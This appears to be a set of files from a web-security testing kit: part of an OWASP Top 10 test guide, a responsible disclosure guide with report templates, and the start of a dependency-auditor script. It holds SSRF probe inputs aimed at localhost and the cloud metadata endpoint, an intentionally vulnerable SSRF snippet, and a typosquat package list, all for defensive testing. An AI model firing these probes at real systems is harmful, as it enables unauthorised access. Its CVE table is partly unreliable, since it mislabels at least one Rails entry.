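Tests 3 and 6 can be run in one pass over a response's header mapping. A minimal sketch of the comparison; pass it something like `requests.get(url).headers`:

```python
# Headers that should be present on every response
REQUIRED_HEADERS = {
    "Content-Security-Policy",
    "Strict-Transport-Security",
    "X-Frame-Options",
    "X-Content-Type-Options",
    "Referrer-Policy",
}
# Headers that disclose implementation details and should be removed
LEAKY_HEADERS = {"Server", "X-Powered-By"}

def audit_headers(headers):
    """Return (missing, leaking) header names for a response header mapping."""
    present = {h.title() for h in headers}
    missing = {h for h in REQUIRED_HEADERS if h not in present}
    leaking = {h for h in LEAKY_HEADERS if h in present}
    return missing, leaking
```
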
### CVSS Scoring Guidance

- **Debug mode in production:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- **Default admin credentials:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Missing security headers:** CVSS 4.3 — AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

---
## A06:2021 — Vulnerable and Outdated Components

**CWEs Covered:** CWE-1035, CWE-1104

### Description

Components (libraries, frameworks, software modules) with known vulnerabilities that can undermine application defenses.

### Test Procedures

| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | npm audit | `npm audit --json` | No critical or high vulnerabilities |
| 2 | pip-audit | `pip-audit --desc` | No known CVEs |
| 3 | Go vulncheck | `govulncheck ./...` | No reachable vulnerabilities |
| 4 | EOL check | Compare framework versions to vendor EOL dates | No EOL components |
| 5 | License audit | Check dependency licenses | No copyleft licenses in proprietary code |

### Remediation

1. Run dependency audits in CI/CD (block merges on critical/high)
2. Set up automated dependency update PRs (Dependabot, Renovate)
3. Pin dependency versions in lock files
4. Remove unused dependencies
5. Subscribe to security advisories for key dependencies

### CVSS Scoring Guidance

Inherit the CVSS score from the upstream CVE. Add environmental metrics based on reachability.

---
## A07:2021 — Identification and Authentication Failures

**CWEs Covered:** CWE-255, CWE-259, CWE-287, CWE-288, CWE-384, CWE-798

### Description

Weaknesses in authentication mechanisms that allow attackers to compromise passwords, keys, session tokens, or exploit implementation flaws to assume other users' identities.

### Test Procedures

| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Brute force | 100 rapid login attempts | Account lockout or exponential backoff |
| 2 | Session cookie flags | Inspect cookies in browser | HttpOnly, Secure, SameSite set |
| 3 | Session invalidation | Logout, replay session cookie | 401 Unauthorized |
| 4 | Username enumeration | Submit valid/invalid usernames | Identical error messages |
| 5 | Password policy | Submit "12345" as password | Rejected (min 8 chars, complexity) |
| 6 | Password reset token | Request reset, check token expiry | Token expires in 15-60 minutes |
| 7 | MFA bypass | Skip MFA step via direct API call | Requires MFA completion |

### Remediation

1. Implement multi-factor authentication
2. Set session cookies with HttpOnly, Secure, SameSite=Strict
3. Invalidate sessions on logout and password change
4. Use generic error messages ("Invalid credentials" not "User not found")
5. Enforce strong password policy (NIST SP 800-63B)
6. Expire password reset tokens within 15-60 minutes
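Test 2 is easy to automate from a raw `Set-Cookie` header value. A minimal sketch of the attribute check:

```python
def audit_session_cookie(set_cookie_value):
    """Return the set of missing security attributes for a Set-Cookie value."""
    # Skip the leading name=value pair; collect attribute names, lowercased
    attrs = {part.strip().split("=")[0].lower()
             for part in set_cookie_value.split(";")[1:]}
    missing = set()
    if "httponly" not in attrs:
        missing.add("HttpOnly")
    if "secure" not in attrs:
        missing.add("Secure")
    if "samesite" not in attrs:
        missing.add("SameSite")
    return missing
```
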
### CVSS Scoring Guidance

- **Authentication bypass:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Session fixation:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Username enumeration:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

---
## A08:2021 — Software and Data Integrity Failures

**CWEs Covered:** CWE-345, CWE-353, CWE-426, CWE-494, CWE-502, CWE-565, CWE-829

### Description

Code and infrastructure that does not protect against integrity violations, including unsafe deserialization, unsigned updates, and CI/CD pipeline manipulation.

### Test Procedures

| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Unsafe deserialization | Send crafted serialized objects | Rejected or safely handled |
| 2 | SRI on CDN resources | Check script/link tags | Integrity attribute present |
| 3 | CI/CD pipeline | Review pipeline config | Signed commits, protected branches |
| 4 | Update integrity | Check update mechanism | Signed artifacts, hash verification |

### Remediation

1. Use `yaml.safe_load()` instead of `yaml.load()`
2. Avoid `pickle.loads()` on untrusted data
3. Add SRI hashes to all CDN-loaded scripts
4. Sign all deployment artifacts
5. Protect CI/CD pipeline with branch protection and signed commits
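Remediation item 3 is simple to automate: an SRI value is just a base64-encoded digest with an algorithm prefix. A minimal sketch:

```python
import base64
import hashlib

def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Compute a Subresource Integrity value for a file served from a CDN."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"

# The result goes in the script tag, e.g.:
# <script src="https://cdn.example.com/lib.js"
#         integrity="sha384-..." crossorigin="anonymous"></script>
```
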
### CVSS Scoring Guidance

- **Unsafe deserialization (RCE):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Missing SRI on CDN scripts:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

---
## A09:2021 — Security Logging and Monitoring Failures

**CWEs Covered:** CWE-117, CWE-223, CWE-532, CWE-778

### Description

Without sufficient logging and monitoring, breaches cannot be detected. Logging too little means missed attacks; logging too much (sensitive data) creates new risks.

### Test Procedures

| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Auth event logging | Attempt valid/invalid logins | Both logged with timestamp and IP |
| 2 | Sensitive data in logs | Review log output | No passwords, tokens, PII, credit cards |
| 3 | Alert thresholds | Trigger 50 failed logins | Alert generated |
| 4 | Log integrity | Check log storage | Append-only or integrity-protected storage |
| 5 | Admin action audit trail | Perform admin actions | All actions logged with user identity |

### Remediation

1. Log all authentication events (success and failure)
2. Sanitize logs — strip passwords, tokens, PII before writing
3. Set up alerting on anomalous patterns (SIEM integration)
4. Use append-only log storage (CloudWatch, Splunk, immutable S3)
5. Maintain audit trail for all admin and data-modifying actions
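Remediation item 2 can be enforced centrally with a logging filter rather than at every call site. A minimal sketch; the redaction pattern is illustrative and should be extended for your log formats:

```python
import logging
import re

# Illustrative pattern: catches "password=...", "token: ..." and similar
REDACT = re.compile(r"(?i)(password|token|secret|authorization)\s*[=:]\s*\S+")

class RedactingFilter(logging.Filter):
    """Strip credential-looking values from records before they are written."""
    def filter(self, record):
        record.msg = REDACT.sub(r"\1=[REDACTED]", str(record.msg))
        return True
```

Attach it once with `logger.addFilter(RedactingFilter())` so every handler sees only sanitized messages.
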
### CVSS Scoring Guidance

Logging failures are typically scored as contributing factors rather than standalone vulnerabilities. When combined with other findings, they increase the overall risk level.

---
## A10:2021 — Server-Side Request Forgery (SSRF)

**CWEs Covered:** CWE-918

### Description

SSRF occurs when a web application fetches a remote resource without validating the user-supplied URL, allowing attackers to reach internal services, cloud metadata endpoints, or other protected resources.

### Test Procedures

| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Internal IP access | Submit `http://127.0.0.1` in URL fields | Request blocked |
| 2 | Cloud metadata | Submit `http://169.254.169.254/latest/meta-data/` | Request blocked |
| 3 | IPv6 localhost | Submit `http://[::1]` | Request blocked |
| 4 | DNS rebinding | Use DNS rebinding service | Request blocked after resolution |
| 5 | URL encoding bypass | Submit `http://0x7f000001` (hex localhost) | Request blocked |
| 6 | Open redirect chain | Find open redirect, chain to internal URL | Request blocked |

### Code Patterns to Detect

```python
# BAD: User-controlled URL without validation
url = request.args.get("url")
response = requests.get(url)  # SSRF!

# GOOD: URL allowlist validation
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}
parsed = urlparse(url)
if parsed.hostname not in ALLOWED_HOSTS:
    abort(403, "URL not in allowlist")
response = requests.get(url)
```

### Remediation

1. Validate and allowlist outbound URLs (domain, scheme, port)
2. Block requests to private IP ranges (10.x, 172.16-31.x, 192.168.x, 127.x, 169.254.x)
3. Block requests to cloud metadata endpoints
4. Use a dedicated egress proxy for outbound requests
5. Disable unnecessary URL-fetching features
6. Resolve DNS and validate the IP address before making the request
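Remediation items 2 and 6 combine into a single check: resolve first, vet every returned address, and connect only to a vetted IP (pinning the resolved IP also blunts DNS rebinding). A minimal sketch using the standard library:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def resolve_and_check(url):
    """Resolve the hostname and reject private/loopback/link-local targets.

    Returns a vetted IP to connect to (pin it; do not re-resolve later),
    or raises ValueError.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        raise ValueError("unsupported URL")
    # The port only matters for resolution, not for the IP range check
    infos = socket.getaddrinfo(parsed.hostname, parsed.port or 443)
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            raise ValueError(f"blocked target IP {ip}")
    return infos[0][4][0]
```
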
### CVSS Scoring Guidance

- **SSRF to cloud metadata (credential theft):** CVSS 9.1 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
- **SSRF to internal service (read):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Blind SSRF (no response data):** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

---
# Responsible Disclosure Guide

A complete guide for responsibly reporting security vulnerabilities found during authorized testing or independent security research.

---

## Disclosure Timeline Templates

### Standard 90-Day Disclosure

The industry-standard timeline used by Google Project Zero, CERT/CC, and most security researchers.

| Day | Action | Owner |
|-----|--------|-------|
| 0 | Discover vulnerability, document with evidence | Researcher |
| 1 | Submit initial report to vendor security contact | Researcher |
| 3 | Confirm report received (if no auto-acknowledgment) | Researcher |
| 7 | Follow up if no acknowledgment received | Researcher |
| 7 | Acknowledge receipt, assign tracking ID | Vendor |
| 14 | Provide initial severity assessment and timeline | Vendor |
| 30 | First status update on remediation progress | Vendor |
| 30 | Request update if none provided | Researcher |
| 60 | Second status update; fix should be in development | Vendor |
| 60 | Offer technical assistance if fix is delayed | Researcher |
| 90 | Public disclosure deadline (with or without fix) | Researcher |
| 90+ | Coordinate joint disclosure statement if fix is ready | Both |

### Accelerated 30-Day Disclosure

For actively exploited vulnerabilities or critical severity (CVSS 9.0+):

| Day | Action |
|-----|--------|
| 0 | Discover, document, report immediately |
| 1 | Vendor acknowledges |
| 7 | Vendor provides remediation timeline |
| 14 | Status update; patch expected |
| 30 | Public disclosure |

### Extended 120-Day Disclosure

For complex vulnerabilities requiring architectural changes:

| Day | Action |
|-----|--------|
| 0 | Report submitted |
| 14 | Vendor acknowledges, confirms complexity |
| 30 | Vendor provides detailed remediation plan |
| 60 | Status update, partial fix may be deployed |
| 90 | Near-complete remediation expected |
| 120 | Full disclosure |

**When to extend:** Only if the vendor is actively working on a fix and communicating progress. A vendor that goes silent does not earn extra time.

---

## Communication Templates

### Initial Vulnerability Report

```
Subject: Security Vulnerability Report — [Brief Title]

To: security@[vendor].com

Dear Security Team,

I am writing to report a security vulnerability I discovered in [Product/Service Name].

## Summary
- **Vulnerability Type:** [e.g., SQL Injection, SSRF, Authentication Bypass]
- **Severity:** [Critical/High/Medium/Low] (CVSS: X.X)
- **Affected Component:** [e.g., /api/login endpoint, User Profile page]
- **Discovery Date:** [YYYY-MM-DD]

## Description
[Clear, technical description of the vulnerability — what it is, where it exists, and why it matters.]

## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step 3]

## Evidence
[Screenshots, request/response pairs, or proof-of-concept code. Non-destructive only.]

## Impact
[What an attacker could achieve by exploiting this vulnerability.]

## Suggested Remediation
[Your recommendation for fixing the issue.]

## Disclosure Timeline
I follow a [90-day] responsible disclosure policy. I plan to publicly disclose this finding on [DATE] unless we agree on an alternative timeline.

## Researcher Information
- Name: [Your Name]
- Organization: [Your Organization, if applicable]
- Contact: [Your Email]
- PGP Key: [Fingerprint or link to public key]

I have not accessed any user data, modified any systems, or shared this information with anyone else. I am happy to provide additional details or assist with remediation.

Best regards,
[Your Name]
```
### Follow-Up (No Response After 7 Days)

```
Subject: Re: Security Vulnerability Report — [Brief Title] (Follow-Up)

Dear Security Team,

I am following up on the security vulnerability report I submitted on [DATE] regarding [Brief Title].

I have not yet received an acknowledgment. Could you please confirm receipt and provide an estimated timeline for review?

For reference, my original report is included below / attached.

I remain available to provide additional details or clarification.

Best regards,
[Your Name]
```

### Status Update Request (Day 30)

```
Subject: Re: Security Vulnerability Report — [Brief Title] (30-Day Update Request)

Dear Security Team,

It has been 30 days since I reported the [vulnerability type] in [component]. I would appreciate an update on:

1. Has the vulnerability been confirmed?
2. What is the remediation timeline?
3. Is there anything I can do to assist?

As noted in my original report, I follow a 90-day disclosure policy. The current disclosure date is [DATE].

Best regards,
[Your Name]
```
### Pre-Disclosure Notification (Day 80)
|
||||
|
||||
```
|
||||
Subject: Re: Security Vulnerability Report — [Brief Title] (Pre-Disclosure Notice)
|
||||
|
||||
Dear Security Team,
|
||||
|
||||
This is a courtesy notice that the 90-day disclosure window for [vulnerability] will close on [DATE].
|
||||
|
||||
Current status as I understand it: [summarize last known status].
|
||||
|
||||
If a fix is not yet available, I recommend:
|
||||
- Publishing a security advisory acknowledging the issue
|
||||
- Providing mitigation guidance to affected users
|
||||
- Communicating a realistic remediation timeline
|
||||
|
||||
I am willing to:
|
||||
- Extend the deadline by [X] days if you can provide a concrete remediation date
|
||||
- Review the patch before public release
|
||||
- Coordinate joint disclosure
|
||||
|
||||
Please respond by [DATE - 5 days] so we can align on the disclosure approach.
|
||||
|
||||
Best regards,
|
||||
[Your Name]
|
||||
```

### Public Disclosure Statement

```
# Security Advisory: [Title]

**Reported:** [Date]
**Disclosed:** [Date]
**Vendor:** [Vendor Name]
**Status:** [Fixed in version X.Y.Z / Unpatched / Mitigated]

## Summary
[Brief description accessible to non-technical readers.]

## Technical Details
[Full technical description, reproduction steps, evidence.]

## Impact
[What could be exploited and the blast radius.]

## Timeline
| Date | Event |
|------|-------|
| [Date] | Vulnerability discovered |
| [Date] | Report submitted to vendor |
| [Date] | Vendor acknowledged |
| [Date] | Fix released (version X.Y.Z) |
| [Date] | Public disclosure |

## Remediation
[Steps users should take — update to version X, apply config change, etc.]

## Credit
Discovered by [Your Name] ([Organization]).
```

---

## Legal Considerations

### Before You Test

1. **Written authorization is required.** For external testing, obtain a signed rules-of-engagement document or scope-of-work. For bug bounty programs, the program's terms of service serve as authorization.

2. **Understand local laws.** The Computer Fraud and Abuse Act (CFAA) in the US, the Computer Misuse Act in the UK, and equivalent laws in other jurisdictions criminalize unauthorized access. Authorization is your legal shield.

3. **Stay within scope.** If the bug bounty program says "*.example.com only," do not test anything outside that scope. If your pen test contract covers the web application, do not pivot to internal networks.

4. **Document everything.** Keep timestamped records of all testing activities: what you tested, when, what you found, and what you did not do (e.g., "did not access real user data").

### During Testing

1. **Do not access real user data.** Use your own test accounts. If you accidentally access real data, stop immediately, document the incident, and report it to the vendor.

2. **Do not cause damage.** No data destruction, no denial-of-service, no resource exhaustion. If a test might cause disruption, get explicit approval first.

3. **Do not exfiltrate data.** Demonstrate the vulnerability with minimal proof. A screenshot showing "1000 records returned" is sufficient — downloading the records is not.

4. **Do not install backdoors.** Even for "maintaining access during testing." If you need persistent access, work with the vendor's team.

### During Disclosure

1. **Do not threaten.** Disclosure timelines are industry practice, not ultimatums. Communicate professionally.

2. **Do not sell vulnerability details.** Selling to exploit brokers instead of reporting to the vendor is irresponsible and may be illegal.

3. **Give vendors reasonable time.** 90 days is standard. Complex architectural fixes may need more time if the vendor is communicating and making progress.

4. **Do not publicly disclose details that help attackers exploit unpatched systems.** If the fix is not yet deployed, disclose the existence and severity of the issue without full exploitation details.
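
The milestones used throughout this guide (update request at day 30, pre-disclosure notice at day 80, disclosure at day 90) can be computed from the report date. A minimal sketch, assuming a 90-day policy; the function name is illustrative:

```python
from datetime import date, timedelta

def disclosure_milestones(report_date: date, window_days: int = 90) -> dict:
    """Compute follow-up and disclosure dates for a vulnerability report."""
    return {
        "30-day update request": report_date + timedelta(days=30),
        "pre-disclosure notice (day 80)": report_date + timedelta(days=window_days - 10),
        "public disclosure": report_date + timedelta(days=window_days),
    }

# Example: a report submitted on 2024-01-15
for label, when in disclosure_milestones(date(2024, 1, 15)).items():
    print(f"{label}: {when.isoformat()}")
```

Putting these dates in your calendar when you submit the report makes the follow-up cadence automatic.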

---

## Bug Bounty Program Integration

### Finding the Right Program

1. **Check the vendor's website:** Look for `/security`, `/.well-known/security.txt`, or a security page
2. **Bug bounty platforms:** HackerOne, Bugcrowd, Intigriti, YesWeHack
3. **No program?** Report to `security@[vendor].com` or use CERT/CC as an intermediary
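
For reference, item 1 mentions `security.txt` (RFC 9116): a plain-text file served at `/.well-known/security.txt` that tells researchers where to report. A minimal example, with placeholder values:

```
Contact: mailto:security@example.com
Expires: 2026-12-31T23:59:59Z
Policy: https://example.com/security-policy
Preferred-Languages: en
Canonical: https://example.com/.well-known/security.txt
```

`Contact` and `Expires` are the required fields; always check this file before falling back to guessing an email address.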

### Bug Bounty Best Practices

1. **Read the entire policy** before testing — scope, exclusions, safe harbor
2. **Test only in-scope assets** — out-of-scope findings may not be rewarded and could be legally risky
3. **Report one vulnerability per submission** — do not bundle unrelated issues
4. **Provide clear reproduction steps** — assume the reader cannot read your mind
5. **Do not duplicate** — search existing reports before submitting
6. **Be patient** — triage can take days to weeks depending on program volume
7. **Do not publicly disclose** until the program explicitly permits it

### If No Bug Bounty Exists

1. Report directly to `security@[vendor].com`
2. If no response after 14 days, try CERT/CC (https://www.kb.cert.org/vuls/report/)
3. Follow the standard disclosure timeline
4. Do not expect payment — responsible disclosure is an ethical practice, not a paid service

---

## CVE Request Process

### When to Request a CVE

- The vulnerability affects publicly available software
- The vendor has confirmed the issue
- A fix is available or will be available soon

### How to Request

1. **Through the vendor:** If the vendor is a CNA (CVE Numbering Authority), they will assign the CVE
2. **Through MITRE:** If the vendor is not a CNA, submit a request at https://cveform.mitre.org/
3. **Through a CNA:** Some platforms (HackerOne, GitHub) are CNAs and can assign CVEs for vulnerabilities in their scope

### Information Required

```
- Vulnerability type (CWE ID if known)
- Affected product and version range
- Fixed version (if available)
- Attack vector (network, local, physical)
- Impact (confidentiality, integrity, availability)
- CVSS score and vector string
- Description (one paragraph, technical but readable)
- References (advisory URL, patch commit, bug report)
```
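
For the CVSS score field, CVSS v3.1 defines standard qualitative bands (0.1-3.9 low, 4.0-6.9 medium, 7.0-8.9 high, 9.0-10.0 critical). A small helper to sanity-check your rating before submitting; the function name is illustrative:

```python
def cvss_severity(score: float) -> str:
    """Map a CVSS v3.1 base score to its qualitative severity rating."""
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS base scores range from 0.0 to 10.0")
    if score == 0.0:
        return "none"
    if score <= 3.9:
        return "low"
    if score <= 6.9:
        return "medium"
    if score <= 8.9:
        return "high"
    return "critical"

print(cvss_severity(9.8))  # critical
```

If the rating you intend to claim in the report does not match the band for your computed base score, triage teams will usually downgrade it for you.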

### CVE ID Format

```
CVE-YYYY-NNNNN
Example: CVE-2024-12345
```

After assignment, the CVE will be published in the NVD (National Vulnerability Database) at https://nvd.nist.gov/.
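
The format is easy to validate mechanically; note that the sequence number is four *or more* digits, not always exactly five. A quick regex check (illustrative):

```python
import re

CVE_PATTERN = re.compile(r"^CVE-\d{4}-\d{4,}$")

def is_valid_cve_id(cve_id: str) -> bool:
    """Return True if the string matches the CVE-YYYY-NNNNN format."""
    return bool(CVE_PATTERN.match(cve_id))

print(is_valid_cve_id("CVE-2024-12345"))  # True
print(is_valid_cve_id("CVE-24-1"))        # False
```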

---

## Key Principles Summary

1. **Report first, disclose later.** Always give the vendor a chance to fix the issue before going public.
2. **Minimize impact.** Prove the vulnerability exists without causing damage or accessing real data.
3. **Communicate professionally.** Security is stressful for everyone. Be clear, helpful, and patient.
4. **Document everything.** Timestamps, evidence, communications — protect yourself and the process.
5. **Follow through.** A report without follow-up helps no one. Stay engaged until the issue is resolved.
6. **Credit where due.** Acknowledge the vendor's response (positive or negative) in your disclosure.
7. **Know the law.** Authorization and scope are your legal foundations. Never test without them.
@@ -0,0 +1,455 @@
#!/usr/bin/env python3
"""
Dependency Auditor - Analyze package manifests for known vulnerable patterns.

Table of Contents:
    DependencyAuditor - Main class for dependency vulnerability analysis
        __init__ - Initialize with manifest path and severity filter
        audit() - Run full audit on the manifest
        _parse_manifest() - Detect and parse the manifest file
        _parse_package_json() - Parse npm package.json
        _parse_requirements() - Parse pip requirements.txt
        _parse_go_mod() - Parse Go go.mod
        _parse_gemfile() - Parse Ruby Gemfile
        _check_vulnerabilities() - Check packages against known CVE patterns
        _check_risky_patterns() - Detect risky dependency patterns
    main() - CLI entry point

Usage:
    python dependency_auditor.py --file package.json
    python dependency_auditor.py --file requirements.txt --severity high
    python dependency_auditor.py --file go.mod --json
"""

import argparse
import json
import re
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List

@dataclass
class Dependency:
    """Represents a parsed dependency."""
    name: str
    version: str
    ecosystem: str  # npm, pypi, go, rubygems
    is_dev: bool = False


@dataclass
class VulnerabilityFinding:
    """A known vulnerability match for a dependency."""
    package: str
    installed_version: str
    vulnerable_range: str
    cve_id: str
    severity: str  # critical, high, medium, low
    title: str
    description: str
    remediation: str
    cvss_score: float = 0.0
    references: List[str] = field(default_factory=list)


@dataclass
class RiskyPattern:
    """A risky dependency pattern (not a CVE, but a concern)."""
    package: str
    pattern_type: str  # pinning, wildcard, deprecated, typosquat
    severity: str
    description: str
    recommendation: str

class DependencyAuditor:
    """Analyze package manifests for known vulnerable patterns and risky dependencies."""

    # Known vulnerable package versions (curated subset of high-profile CVEs)
    KNOWN_VULNS = [
        {"ecosystem": "npm", "package": "lodash", "below": "4.17.21",
         "cve": "CVE-2021-23337", "severity": "high", "cvss": 7.2,
         "title": "Command Injection in lodash",
         "description": "lodash before 4.17.21 is vulnerable to Command Injection via template function.",
         "remediation": "Upgrade lodash to >=4.17.21"},
        {"ecosystem": "npm", "package": "axios", "below": "1.6.0",
         "cve": "CVE-2023-45857", "severity": "medium", "cvss": 6.5,
         "title": "CSRF token exposure in axios",
         "description": "axios before 1.6.0 inadvertently exposes CSRF tokens in cross-site requests.",
         "remediation": "Upgrade axios to >=1.6.0"},
        {"ecosystem": "npm", "package": "express", "below": "4.19.2",
         "cve": "CVE-2024-29041", "severity": "medium", "cvss": 6.1,
         "title": "Open Redirect in express",
         "description": "express before 4.19.2 allows open redirects via malicious URLs.",
         "remediation": "Upgrade express to >=4.19.2"},
        {"ecosystem": "npm", "package": "jsonwebtoken", "below": "9.0.0",
         "cve": "CVE-2022-23529", "severity": "critical", "cvss": 9.8,
         "title": "Insecure key retrieval in jsonwebtoken",
         "description": "jsonwebtoken before 9.0.0 allows key confusion attacks via secretOrPublicKey.",
         "remediation": "Upgrade jsonwebtoken to >=9.0.0"},
        {"ecosystem": "npm", "package": "minimatch", "below": "3.0.5",
         "cve": "CVE-2022-3517", "severity": "high", "cvss": 7.5,
         "title": "ReDoS in minimatch",
         "description": "minimatch before 3.0.5 is vulnerable to Regular Expression Denial of Service.",
         "remediation": "Upgrade minimatch to >=3.0.5"},
        {"ecosystem": "npm", "package": "tar", "below": "6.1.9",
         "cve": "CVE-2021-37713", "severity": "high", "cvss": 8.6,
         "title": "Arbitrary File Creation in tar",
         "description": "tar before 6.1.9 allows arbitrary file creation/overwrite via symlinks.",
         "remediation": "Upgrade tar to >=6.1.9"},
        {"ecosystem": "pypi", "package": "pillow", "below": "9.3.0",
         "cve": "CVE-2022-45198", "severity": "high", "cvss": 7.5,
         "title": "DoS via crafted image in Pillow",
         "description": "Pillow before 9.3.0 allows denial of service via specially crafted image files.",
         "remediation": "Upgrade Pillow to >=9.3.0"},
        {"ecosystem": "pypi", "package": "django", "below": "4.2.8",
         "cve": "CVE-2023-46695", "severity": "high", "cvss": 7.5,
         "title": "DoS via file uploads in Django",
         "description": "Django before 4.2.8 allows denial of service via large file uploads.",
         "remediation": "Upgrade Django to >=4.2.8"},
        {"ecosystem": "pypi", "package": "flask", "below": "2.3.2",
         "cve": "CVE-2023-30861", "severity": "high", "cvss": 7.5,
         "title": "Session cookie exposure in Flask",
         "description": "Flask before 2.3.2 may expose session cookies on cross-origin redirects.",
         "remediation": "Upgrade Flask to >=2.3.2"},
        {"ecosystem": "pypi", "package": "requests", "below": "2.31.0",
         "cve": "CVE-2023-32681", "severity": "medium", "cvss": 6.1,
         "title": "Proxy-Authorization header leak in requests",
         "description": "requests before 2.31.0 leaks Proxy-Authorization headers on redirects.",
         "remediation": "Upgrade requests to >=2.31.0"},
        {"ecosystem": "pypi", "package": "cryptography", "below": "41.0.0",
         "cve": "CVE-2023-38325", "severity": "high", "cvss": 7.5,
         "title": "NULL dereference in cryptography",
         "description": "cryptography before 41.0.0 has a NULL pointer dereference in PKCS7 parsing.",
         "remediation": "Upgrade cryptography to >=41.0.0"},
        {"ecosystem": "pypi", "package": "pyyaml", "below": "6.0.1",
         "cve": "CVE-2020-14343", "severity": "critical", "cvss": 9.8,
         "title": "Arbitrary code execution in PyYAML",
         "description": "PyYAML before 6.0.1 allows arbitrary code execution via yaml.load().",
         "remediation": "Upgrade PyYAML to >=6.0.1 and use yaml.safe_load()"},
        {"ecosystem": "go", "package": "golang.org/x/crypto", "below": "0.17.0",
         "cve": "CVE-2023-48795", "severity": "medium", "cvss": 5.9,
         "title": "Terrapin SSH prefix truncation attack",
         "description": "golang.org/x/crypto before 0.17.0 vulnerable to SSH prefix truncation.",
         "remediation": "Upgrade golang.org/x/crypto to >=0.17.0"},
        {"ecosystem": "go", "package": "golang.org/x/net", "below": "0.17.0",
         "cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5,
         "title": "HTTP/2 rapid reset DoS",
         "description": "golang.org/x/net before 0.17.0 vulnerable to HTTP/2 rapid reset attack.",
         "remediation": "Upgrade golang.org/x/net to >=0.17.0"},
        {"ecosystem": "rubygems", "package": "rails", "below": "7.0.8",
         "cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5,
         "title": "ReDoS in Rails",
         "description": "Rails before 7.0.8 vulnerable to Regular Expression Denial of Service.",
         "remediation": "Upgrade rails to >=7.0.8"},
    ]

    # Known typosquat / malicious package names
    TYPOSQUAT_PACKAGES = {
        "npm": ["crossenv", "event-stream-malicious", "flatmap-stream", "ua-parser-jss",
                "loadsh", "lodashs", "axois", "requets"],
        "pypi": ["python3-dateutil", "jeIlyfish", "python-binance-sdk", "requestss",
                 "djago", "flassk", "requets"],
    }
    def __init__(self, manifest_path: str, severity_filter: str = "low"):
        self.manifest_path = Path(manifest_path)
        self.severity_filter = severity_filter
        self.severity_order = {"critical": 4, "high": 3, "medium": 2, "low": 1}
        self.min_severity = self.severity_order.get(severity_filter, 1)

    def audit(self) -> Dict:
        """Run full audit on the manifest file."""
        deps = self._parse_manifest()
        vuln_findings = self._check_vulnerabilities(deps)
        risky_patterns = self._check_risky_patterns(deps)

        # Filter by severity
        vuln_findings = [f for f in vuln_findings
                         if self.severity_order.get(f.severity, 0) >= self.min_severity]
        risky_patterns = [r for r in risky_patterns
                          if self.severity_order.get(r.severity, 0) >= self.min_severity]

        return {
            "manifest": str(self.manifest_path),
            "ecosystem": deps[0].ecosystem if deps else "unknown",
            "total_dependencies": len(deps),
            "dev_dependencies": len([d for d in deps if d.is_dev]),
            "vulnerability_findings": vuln_findings,
            "risky_patterns": risky_patterns,
            "summary": {
                "critical": len([f for f in vuln_findings if f.severity == "critical"]),
                "high": len([f for f in vuln_findings if f.severity == "high"]),
                "medium": len([f for f in vuln_findings if f.severity == "medium"]),
                "low": len([f for f in vuln_findings if f.severity == "low"]),
                "risky_patterns_count": len(risky_patterns),
            },
        }
    def _parse_manifest(self) -> List[Dependency]:
        """Detect manifest type and parse dependencies."""
        name = self.manifest_path.name.lower()
        try:
            content = self.manifest_path.read_text(encoding="utf-8")
        except (OSError, PermissionError) as e:
            print(f"Error reading {self.manifest_path}: {e}", file=sys.stderr)
            sys.exit(1)

        if name == "package.json":
            return self._parse_package_json(content)
        elif name in ("requirements.txt", "requirements-dev.txt", "requirements_dev.txt"):
            return self._parse_requirements(content)
        elif name == "go.mod":
            return self._parse_go_mod(content)
        elif name in ("gemfile", "gemfile.lock"):
            return self._parse_gemfile(content)
        else:
            print(f"Unsupported manifest type: {name}", file=sys.stderr)
            print("Supported: package.json, requirements.txt, go.mod, Gemfile", file=sys.stderr)
            sys.exit(1)
    def _parse_package_json(self, content: str) -> List[Dependency]:
        """Parse npm package.json."""
        deps = []
        try:
            data = json.loads(content)
        except json.JSONDecodeError as e:
            print(f"Invalid JSON in package.json: {e}", file=sys.stderr)
            sys.exit(1)

        for name, version in data.get("dependencies", {}).items():
            clean_ver = re.sub(r"[^0-9.]", "", version).strip(".")
            deps.append(Dependency(name=name, version=clean_ver or version, ecosystem="npm", is_dev=False))
        for name, version in data.get("devDependencies", {}).items():
            clean_ver = re.sub(r"[^0-9.]", "", version).strip(".")
            deps.append(Dependency(name=name, version=clean_ver or version, ecosystem="npm", is_dev=True))
        return deps
    def _parse_requirements(self, content: str) -> List[Dependency]:
        """Parse pip requirements.txt."""
        deps = []
        for line in content.strip().split("\n"):
            line = line.strip()
            if not line or line.startswith("#") or line.startswith("-"):
                continue
